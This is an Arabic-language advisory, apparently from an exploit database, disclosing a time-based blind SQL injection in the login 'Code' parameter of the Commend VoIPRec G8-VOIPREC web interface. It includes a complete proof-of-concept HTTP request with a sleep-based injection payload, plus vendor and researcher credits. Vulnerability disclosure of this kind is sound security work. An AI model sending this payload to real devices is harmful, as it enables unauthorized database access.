
استغلال إثبات مفهوم لحقن SQL الأعمى القائم على الوقت في جهاز Commend VoIPRec G8-VOIPREC، يستهدف معامل Code القابل للثغرة للتلاعب بقاعدة البيانات.
واجهة الويب الخاصة بـ G8-VOIPREC (Commend VoIPRec) معرضة لحقن SQL أعمى قائم على الوقت في معامل "Code" في صفحة تسجيل الدخول.
PoC:
POST /cgi-bin/SecComRecX.cgi HTTP/1.1 Host: 192.168.88.10 User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0 Accept: application/json, text/javascript, /; q=0.01 Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Content-Length: 78 Origin: http://192.168.88.10 Connection: close Referer: http://192.168.88.10/ComRecX/comrecxapp.html
Action=request&Code=userpasswordasdasd'%2b(select*from(select(sleep(6)))a)%2b'
حقن SQL
Commend International
G8-VOIPREC
عن بُعد
true
يمكن للمستخدم البعيد استخدام كود SQL خبيث للتلاعب بقاعدة البيانات الخلفية للوصول إلى معلومات لم يكن من المقصود عرضها.
Alexander Starikov (Jet Infosystems, jet.su), Ivashchenko Sergey (Jet Infosystems, jet.su)